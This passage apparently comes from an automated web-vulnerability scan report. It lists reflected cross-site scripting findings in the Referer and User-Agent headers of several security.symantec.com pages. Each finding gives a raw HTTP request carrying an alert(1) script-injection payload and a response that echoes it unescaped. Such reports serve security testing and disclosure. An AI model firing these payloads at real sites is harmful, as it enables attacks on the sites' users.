Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/help.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=638d3'-alert(1)-'fbef2f3541b

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 84148
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:12 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
ry = "unknown_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: help';

   var strReferrer = 'http://www.google.com/search?hl=en&q=638d3'-alert(1)-'fbef2f3541b';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...

4.227. http://security.symantec.com/sscv6/help.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/help.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 49f34<script>alert(1)</script>df5350d6615 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/help.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: 49f34<script>alert(1)</script>df5350d6615
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11480
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:09 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>49f34<script>alert(1)</script>df5350d6615</i>
...[SNIP]...

4.228. http://security.symantec.com/sscv6/home.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/home.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14a0e'-alert(1)-'2a5e8bc09c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/home.asp?langid=ie&venid=sym&close_parent=true&bhcp=1 HTTP/1.1
Host: security.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=14a0e'-alert(1)-'2a5e8bc09c0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_cc=true; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhCookieSaveSess=1; bhCookieSess=1; bhResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:01:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 17283
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:00:21 GMT
Cache-control: private


<html>
<head>
<title>Free Antivirus Protection - Free Anti-virus Software</title>
<meta name="description" content="Test your computer's exposure to online security threats with free antivirus p
...[SNIP]...
ry = "unknown_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: home';

   var strReferrer = 'http://www.google.com/search?hl=en&q=14a0e'-alert(1)-'2a5e8bc09c0';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...

4.229. http://security.symantec.com/sscv6/home.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/home.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6242'-alert(1)-'a5b2f047f13 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/home.asp?langid=ie&venid=sym&plfid=21&pkj=IZLQLSIVFWMFKPXKBQW HTTP/1.1
Host: security.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e6242'-alert(1)-'a5b2f047f13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_cc=true; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhCookieSaveSess=1; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:00:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 16933
Content-Type: text/html
Expires: Sun, 17 Apr 2011 12:59:50 GMT
Cache-control: private


<html>
<head>
<title>Free Antivirus Protection - Free Anti-virus Software</title>
<meta name="description" content="Test your computer's exposure to online security threats with free antivirus p
...[SNIP]...
ry = "unknown_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: home';

   var strReferrer = 'http://www.google.com/search?hl=en&q=e6242'-alert(1)-'a5b2f047f13';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...

4.230. http://security.symantec.com/sscv6/home.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/home.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 1f865<script>alert(1)</script>2502dcb34dd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/home.asp?langid=ie&venid=sym&plfid=21&pkj=IZLQLSIVFWMFKPXKBQW HTTP/1.1
Host: security.symantec.com
Proxy-Connection: keep-alive
Referer: http://security.symantec.com/sscv6/home.asp?langid=ie&venid=sym&close_parent=true
User-Agent: 1f865<script>alert(1)</script>2502dcb34dd
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_cc=true; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhCookieSaveSess=1; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11589
Content-Type: text/html
Expires: Sun, 17 Apr 2011 12:59:48 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>1f865<script>alert(1)</script>2502dcb34dd</i>
...[SNIP]...

4.231. http://security.symantec.com/sscv6/sc_about.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/sc_about.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da49e'-alert(1)-'1b388834f80 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/sc_about.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=da49e'-alert(1)-'1b388834f80

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 13911
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:12 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
untry";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: security scan: about';

   var strReferrer = 'http://www.google.com/search?hl=en&q=da49e'-alert(1)-'1b388834f80';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...

4.232. http://security.symantec.com/sscv6/sc_about.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/sc_about.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 636d7<script>alert(1)</script>7ca210fd618 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/sc_about.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: 636d7<script>alert(1)</script>7ca210fd618
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11484
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:09 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>636d7<script>alert(1)</script>7ca210fd618</i>
...[SNIP]...

4.233. http://security.symantec.com/sscv6/security_solutions.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/security_solutions.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e4ff'-alert(1)-'13a46783dc4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/security_solutions.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=3e4ff'-alert(1)-'13a46783dc4

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 18500
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:09 GMT
Cache-control: private

<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security C
...[SNIP]...
country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: security solutions';

   var strReferrer = 'http://www.google.com/search?hl=en&q=3e4ff'-alert(1)-'13a46783dc4';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...

4.234. http://security.symantec.com/sscv6/security_solutions.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/security_solutions.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 39bf5<script>alert(1)</script>f090c2990df was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/security_solutions.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: 39bf5<script>alert(1)</script>f090c2990df
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11494
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:06 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>39bf5<script>alert(1)</script>f090c2990df</i>
...[SNIP]...

4.235. http://security.symantec.com/sscv6/ssc_EULA.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/ssc_EULA.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a180'-alert(1)-'bafe39e602 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/ssc_EULA.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=6a180'-alert(1)-'bafe39e602

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 21284
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:11 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Securi
...[SNIP]...
;

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: end user license agreement';

   var strReferrer = 'http://www.google.com/search?hl=en&q=6a180'-alert(1)-'bafe39e602';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...

4.236. http://security.symantec.com/sscv6/ssc_EULA.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/ssc_EULA.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a6601<script>alert(1)</script>44de2872daa was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/ssc_EULA.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: a6601<script>alert(1)</script>44de2872daa
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11484
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:08 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>a6601<script>alert(1)</script>44de2872daa</i>
...[SNIP]...

4.237. http://security.symantec.com/sscv6/vc_about.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/vc_about.asp

Issue detail

